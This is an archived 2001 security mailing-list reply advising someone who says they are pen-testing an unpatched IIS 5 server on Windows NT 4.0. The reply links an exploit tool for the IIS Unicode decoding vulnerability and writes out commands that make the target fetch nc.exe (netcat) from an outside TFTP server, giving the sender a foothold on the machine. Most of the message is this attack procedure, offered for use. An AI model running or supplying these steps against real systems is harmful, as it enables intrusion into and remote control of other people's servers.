Hi, In most cases I find the easiest way to upload files is tftp. There are loads of tftp server programs however I recommend tftpd32 (attached). use Unicode or escaped characters decoding vulnerability http://www.sec-1.com/iisenc.zip and use tftp.exe -i tftp.ip.addr GET nc.exe nc.exe With iisenc.pl use cmd /c> \\ Enter alternative command e.g. net.exe, tftp.exe >tftp.exe tftp.exe>-i tftp.ip.addr GET nc.exe nc.exe Regards Gary O'leary-Steele > -----Original Message----- > Greetings. > I am pen-testing IIS 5 [no hotfixes] running in WinNT 4.0 > with no fixes. At > this point I want to upload a file to the box [nc.exe] and then I will > definately have the box. How can I go about doing this? > Free, encrypted, secure Web-based email at www.hushmail.com IMPORTANT NOTICE: If you are not using HushMail, this message could have been read easily by the many people who have access to your open personal email messages. Get your FREE, totally secure email address at http://www.hushmail.com.
This archive was generated by hypermail 2b30 : Sun Jun 24 2001 - 19:31:58 PDT